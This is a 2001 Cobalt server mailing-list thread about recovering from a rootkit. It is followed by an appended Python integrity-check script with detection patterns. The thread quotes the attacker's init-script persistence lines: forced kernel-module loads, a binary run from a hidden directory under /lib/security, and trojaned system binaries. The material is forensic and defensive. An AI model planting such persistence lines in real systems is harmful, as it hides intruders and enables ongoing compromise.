
RE: [cobalt-users] Recent Hacks (resolution in sight)



oh wait...the GUI is unavailable??? How so?
Can you get in via the serial port and a console session?
Is it a RAQ or a Qube?
I had no success with the serial port on the Qube, but I have been told
since that there may be something wrong with the hardware, *your*
mileage may vary.
-C

>-----Original Message-----
>From: cobalt-users-admin@xxxxxxxxxxxxxxx
>[mailto:cobalt-users-admin@xxxxxxxxxxxxxxx]On Behalf Of Chris Mason
>Sent: Friday, February 09, 2001 7:46 AM
>To: cobalt-users@xxxxxxxxxxxxxxx
>Subject: RE: [cobalt-users] Recent Hacks (resolution in sight)
>
>
>You think you have problems! I got so paranoid with all this
>talk of cracked
>machines that I rushed this morning to install ipchains, pmfirewall,
>portsentry, and logcheck. I only use SSH, I've disabled telnet.
>Unfortunately I was a little careless in my installation and I have now
>totally locked myself out of the machine. I can't ssh, there's
>no telnet,
>the gui is not available as I installed a certificate, I don't
>know what
>next to do. Even tech support at the hosting location may not
>be able to get
>in!
>
>Any ideas?
>
>Chris Mason
>Box 340, The Valley, Anguilla, British West Indies
>Tel: 264 497 5670 Fax: 264 497 8463
>USA Fax (561) 382-7771
>Take a virtual tour of the island
>http://net.ai/ The Anguilla Guide
>Find out more about NetConcepts
>www.netconcepts.ai
>Talk to me in real time with Instant Messenger: masonc92@xxxxxxxxxxx
>
>-----Original Message-----
>From: cobalt-users-admin@xxxxxxxxxxxxxxx
>[mailto:cobalt-users-admin@xxxxxxxxxxxxxxx]On Behalf Of inc
>Sent: Friday, February 09, 2001 8:35 AM
>To: cobalt-users@xxxxxxxxxxxxxxx
>Subject: [cobalt-users] Recent Hacks (resolution in sight)
>
>
>
>thanks to those who maintained email with me today; it's been
>a great help.
>
>here's my report:
>
>
>i've successfully (touch wood) used the unhack.pl script recommended by
>Steve Bassi via Mike Fritsch.
>
>after running unhack.pl, there's one file that unhack said was neither
>hacked (according to its internal MD5 checksums) nor "original" cobalt.
>
>this file, /etc/rc.d/init.d/network contains the following
>which i would say
>is part of the hack.
>
>        /usr/bin/ssh2d -q
>        if test -f "/dev/kmod"; then
>        /sbin/insmod -f /usr/lib/crth.o
>        /sbin/insmod -f /usr/lib/crtz.o
>        fi
>        if test -f /lib/security/.config/sn ; then
>        cd /lib/security/.config;./lpsched
>        fi
>        touch /var/lock/subsys/network
>        if test -f "/dev/dos"; then
>        /usr/lib/lpq
>        fi
>        ;;
>
>
>i've not installed ssh2d, and crth.o and crtz.o look damned
>nasty to me.
>note that unhack.pl DOESN'T clear up crtz.o.  can anyone shed
>some light on
>the remaining commands there?  i've disabled all these lines
>until i know
>what they are.  my "network" script was considerably more
>complicated than
>the "network" script included with unhack.tar.gz
>
>i also spent the whole day studying up on cracking and
>studying the scripts
>and binaries that were placed on my raq.
>
>the only weird thing i could find in my logs was an ftp login
>from korea.  i
>have not published any ftp site urls anywhere, and this is the only ftp
>login i've ever seen in the logs apart from my own, and the 127.0.0.1
>entries used by the admin.  this ftp login occurred 4 hours before the
>rootkit was activated.
>
>so i would think that proftpd was exploited to gain root access.
>
>all log entries bar the ftp one above were cleaned up, but there were
>footsteps left behind in /.bash_history which reflected an rcp
>download from
>a us .edu site.
>
>at this point ps, su, all manner of executables are replaced
>to hide any
>unusual activity.  flash22 suggested i try "top" -- which lo and behold
>turned up all my logins running as "/bin/xlogin" -- which
>appeared to be a
>copy of the original cobalt "/bin/login" .. a file
>/etc/ld.so.hash seems to
>have a crypted password in it.  the replaced "/bin/login" was
>a very small
>file next to the original cobalt "/bin/login".
>
>
>i'm happy to answer any questions on this.
>
>thanks again to those who helped me climb out of the black hole!
>
>
>--
>chris paul
>fastmedia.net
>
>
>
>
>_______________________________________________
>cobalt-users mailing list
>cobalt-users@xxxxxxxxxxxxxxx
>To Subscribe or Unsubscribe, please go to:
>http://list.cobalt.com/mailman/listinfo/cobalt-users
>
>
>
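The report quoted above describes two checks done largely by hand: comparing files against known-good and known-bad MD5 sums (which is how unhack.pl sorted files into "original", "hacked" and "neither"), and reading through the modified /etc/rc.d/init.d/network looking for lines that do not belong. The following is an added example, not code from this thread, from unhack.pl or from Cobalt, showing both checks as a small Python triage script. The file contents, manifests and hashes are constructed placeholders; the init-script fragment is the one quoted in the post, and the heuristics (hidden dot-directories, forced module loads, `test -f` on a path under /dev, executing a file out of /usr/lib) are a defender's starting list, not a complete rootkit signature.

```python
"""Integrity triage in the spirit of the unhack.pl check described in the
report. Added example: all manifests and file contents below are
constructed for illustration, not real Cobalt checksums."""
import hashlib
import re


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


# Constructed stand-ins for the vendor's originals and for a known
# trojaned replacement. A real manifest would hold hashes of real files.
TRUSTED_CONTENT = {
    "/bin/login": b"original cobalt login binary (constructed)",
    "/bin/ps": b"original cobalt ps binary (constructed)",
    "/etc/rc.d/init.d/network": b"#!/bin/sh\n# original network script (constructed)\n",
}
KNOWN_BAD_CONTENT = {
    "/bin/ps": b"trojaned ps that hides processes (constructed)",
}
ORIGINAL_MD5 = {p: md5_hex(c) for p, c in TRUSTED_CONTENT.items()}
KNOWN_BAD_MD5 = {p: md5_hex(c) for p, c in KNOWN_BAD_CONTENT.items()}


def classify(path: str, contents: bytes) -> str:
    """Three outcomes, as in the report: matches the shipped original,
    matches a known rootkit file, or neither (needs manual review)."""
    h = md5_hex(contents)
    if ORIGINAL_MD5.get(path) == h:
        return "original"
    if KNOWN_BAD_MD5.get(path) == h:
        return "known_hacked"
    return "unknown"


# Heuristics for lines an init script should not normally contain.
# First matching rule wins; each line is reported at most once.
SUSPICIOUS = [
    (re.compile(r'/\.[^/\s";]+'), "hidden dot-path component"),
    (re.compile(r"\binsmod\b.*\s-f\b"), "forced kernel module load"),
    (re.compile(r'test\s+-f\s+"?/dev/'), "regular-file test under /dev"),
    (re.compile(r"^\s*/usr/lib/\S+\s*$"), "executes a file from /usr/lib"),
]


def scan_init_script(text: str):
    """Return (line_number, reason, line) for every flagged line."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        for pattern, why in SUSPICIOUS:
            if pattern.search(line):
                findings.append((n, why, line.strip()))
                break
    return findings


# The fragment quoted in the report, reproduced here as sample input.
SAMPLE_NETWORK_FRAGMENT = "\n".join([
    "/usr/bin/ssh2d -q",
    'if test -f "/dev/kmod"; then',
    "/sbin/insmod -f /usr/lib/crth.o",
    "/sbin/insmod -f /usr/lib/crtz.o",
    "fi",
    "if test -f /lib/security/.config/sn ; then",
    "cd /lib/security/.config;./lpsched",
    "fi",
    "touch /var/lock/subsys/network",
    'if test -f "/dev/dos"; then',
    "/usr/lib/lpq",
    "fi",
])

# Constructed "observed" files: one untouched, one trojaned, one locally
# edited (so neither manifest knows it, like the network script above).
OBSERVED = {
    "/bin/login": TRUSTED_CONTENT["/bin/login"],
    "/bin/ps": KNOWN_BAD_CONTENT["/bin/ps"],
    "/etc/rc.d/init.d/network": b"#!/bin/sh\n# locally edited (constructed)\n",
}

if __name__ == "__main__":
    for path, contents in OBSERVED.items():
        print(f"{classify(path, contents):13s} {path}")
    for n, why, line in scan_init_script(SAMPLE_NETWORK_FRAGMENT):
        print(f"line {n:2d}: {why}: {line}")
```

Note what the heuristics miss: the first line, `/usr/bin/ssh2d -q`, is not flagged by any rule, which is exactly why the report's author still had to know that no ssh2d was ever installed. Hash manifests answer "is this file what the vendor shipped"; pattern rules only narrow down what a person must read.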
>